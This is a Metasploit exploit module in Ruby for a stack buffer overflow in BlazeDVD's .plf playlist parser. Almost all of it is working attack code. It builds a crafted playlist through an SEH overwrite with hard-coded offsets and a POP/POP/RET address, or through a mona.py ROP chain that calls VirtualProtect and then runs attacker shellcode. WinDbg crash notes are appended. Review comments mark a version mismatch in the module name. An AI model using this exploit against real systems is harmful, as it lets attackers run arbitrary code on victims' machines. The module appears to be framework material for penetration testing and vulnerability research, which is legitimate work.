##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
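class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  # File-format exploit for BlazeDVD .plf playlists. Two layouts are
  # supported, selected by target name:
  #
  #   * 'BlazeDVD 6.2' -- filler + a mona.py-generated ROP chain that calls
  #     VirtualProtect() and then returns into the appended shellcode.
  #   * 'BlazeDVD 5.1' -- SEH overwrite: nSEH at offset 868 (short jump),
  #     SEH handler at 872 (POP/POP/RET in SkinScrollBar.dll), NOP sled and
  #     shellcode directly behind it.
  #
  # All gadget / return addresses are hard-coded for the non-rebased module
  # layout recorded in the WinDbg notes at the bottom of this file; they
  # will not survive a different build of EPG.dll / SkinScrollBar.dll.
  #
  # NOTE(review): the 'Name' says "6.1" while the description and the
  # targets cover 5.1 and 6.2 -- confirm the intended version string before
  # relying on it for module lookup.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow',
        'Description' => %q{
          This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When
          the application is used to open a specially crafted plf file,
          a buffer is overwritten allowing for the execution of arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'MC', # Developed target 5.1
          'Deepak Rathore', # ExploitDB PoC
          'Spencer McIntyre', # Developed target 6.2
          'Ken Smith' # Developed target 6.2
        ],
        'References' => [
          [ 'CVE', '2006-6199' ],
          [ 'EDB', '32737' ],
          [ 'OSVDB', '30770' ],
          [ 'BID', '35918' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'AllowWin32SEH' => true
        },
        'Payload' => {
          # 750 bytes keeps the 5.1 layout (shellcode at offset 888) well
          # inside the 6024-byte buffer built in #exploit.
          'Space' => 750,
          # Presumably bytes the playlist parser will not pass through
          # intact; every gadget address and negated constant in #rop_chain
          # is chosen so that none of them appears.
          'BadChars' => "\x00\x0a\x1a",
          'DisableNops' => true
        },

        'Platform' => 'win',
        'Targets' => [
          [
            'BlazeDVD 6.2',
            {
              'Payload' => {
                # Stack pivot prepended to the decoder: add esp, 0xfffff254
                # (i.e. esp -= 0xdac). Presumably moves the stack away from
                # the shellcode it is about to unpack -- re-check against the
                # crash layout if the chain or filler length changes.
                'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
              }
            }
          ],
          [
            'BlazeDVD 5.1',
            {
              # POP ESI / POP ECX / RET in SkinScrollBar.dll, found with the
              # "s -b ... 5e 59 c3" search in the WinDbg notes below; it is
              # written over the SEH handler.
              'Ret' => 0x100101e7,
              'Payload' => {
                # Matches the uppercase-alpha filler this target is built from.
                'EncoderType' => Msf::Encoder::Type::AlphanumUpper
              }
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2009-08-03',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SERVICE_DOWN, ],
          'SideEffects' => [ SCREEN_EFFECTS, ],
          'Reliability' => UNKNOWN_RELIABILITY,
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),
      ]
    )
  end

  # Returns the packed (little-endian DWORD) ROP chain for the selected target.
  #
  # Only 'BlazeDVD 6.2' has a chain. Any other target aborts the module with
  # Failure::NoTarget instead of returning nil, which previously surfaced as
  # a NoMethodError from nil.flatten.
  #
  # The chain is the mona.py PUSHAD pattern: the registers are loaded so that
  # PUSHAD # RETN ends up calling VirtualProtect(lpAddress = ESP,
  # dwSize = 0x201, flNewProtect = 0x40 PAGE_EXECUTE_READWRITE,
  # lpflOldProtect = writable scratch) with a PUSH ESP # RET gadget as the
  # return address, so execution continues in the now-executable stack where
  # the shellcode sits. 0x201 and 0x40 are loaded as negated values because
  # their little-endian encodings contain NUL, a badchar.
  def rop_chain
    # rop chain generated with mona.py - www.corelan.be
    unless target.name == 'BlazeDVD 6.2'
      fail_with(Failure::NoTarget, "No ROP chain is defined for target '#{target.name}'")
    end

    ret_nop = 0x6162e802 # RETN (ROP NOP) [EPG.dll]
    # Eight RETNs up front; presumably a sled so the overwritten return
    # address does not need to hit the first real gadget exactly.
    gadgets = [ret_nop] * 8
    gadgets += [
      0x61636758, # POP EAX # RETN [EPG.dll]
      0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
      0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
      0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll]      -> ESI = VirtualProtect
      0x61628ea2, # POP EBP # RETN [EPG.dll]
      0x616069a1, # push esp # ret 0x04 [EPG.dll]           -> EBP = return into stack
      0x61626702, # POP EAX # RETN [EPG.dll]
      0xfffffdff, # Value to negate, will become 0x00000201
      0x61627d9c, # NEG EAX # RETN [EPG.dll]
      0x61640124, # XCHG EAX,EBX # RETN [EPG.dll]           -> EBX = dwSize
      0x61629938, # POP EAX # RETN [EPG.dll]
      0xffffffc0, # Value to negate, will become 0x00000040
      0x61627d9c, # NEG EAX # RETN [EPG.dll]
      0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll]           -> EDX = flNewProtect
      0x61612f5a, # POP ECX # RETN [EPG.dll]
      0x100142ab, # &Writable location [SkinScrollBar.Dll]  -> ECX = lpflOldProtect
      0x616313ac, # POP EDI # RETN [EPG.dll]
      0x6162e588, # RETN (ROP NOP) [EPG.dll]                -> EDI = ROP NOP
      0x6162d638, # POP EAX # RETN [EPG.dll]
      0x90909090, # nop                                     -> EAX = filler
      0x61620831, # PUSHAD # RETN [EPG.dll]
    ]
    gadgets.pack('V*')
  end

  # Builds the .plf for the selected target and writes it with file_create.
  #
  # 5.1 layout (offsets taken from the pattern_offset output at the end of
  # the file): the SEH record is overwritten at 868. nSEH gets a 2-byte
  # short jump (+6) followed by two uppercase padding bytes; the handler at
  # 872 gets the POP/POP/RET from target.ret. After POP/POP/RET lands on
  # nSEH, the jump reaches offset 876 (868 + 2 + 6), a 12-byte NOP sled,
  # and the shellcode starts at 888.
  #
  # 6.2 layout: 260 bytes of alphanumeric filler, the ROP chain, then the
  # shellcode that the chain's VirtualProtect() call makes executable.
  #
  # An unrecognised target name aborts with Failure::NoTarget instead of
  # handing nil to file_create.
  def exploit
    shellcode = payload.encoded

    plf =
      case target.name
      when 'BlazeDVD 5.1'
        buf = rand_text_alpha_upper(6024)
        buf[868, 8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V')
        buf[876, 12] = make_nops(12)
        buf[888, shellcode.length] = shellcode
        buf
      when 'BlazeDVD 6.2'
        rand_text_alphanumeric(260) + rop_chain + shellcode
      else
        fail_with(Failure::NoTarget, "Unsupported target '#{target.name}'")
      end

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(plf)
  end
end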
=begin
0:000> !exchain
0012f2c8: 31644230
Invalid exception stack at 64423963
0:000> !pattern_offset 6024 0x31644230
[Byakugan] Control of 0x31644230 at offset 872.
0:000> !pattern_offset 6024 0x64423963
[Byakugan] Control of 0x64423963 at offset 868.
0:000> s -b 0x10000000 0x10018000 5e 59 c3
100012cd 5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00 ^Y.V.t$.W..V..<.
100101e7 5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24 ^Y........D$..L$
0:000> u 0x100012cd L3
skinscrollbar!SkinSB_ParentWndProc+0x1fd:
100012cd 5e pop esi
100012ce 59 pop ecx
100012cf c3 ret
=end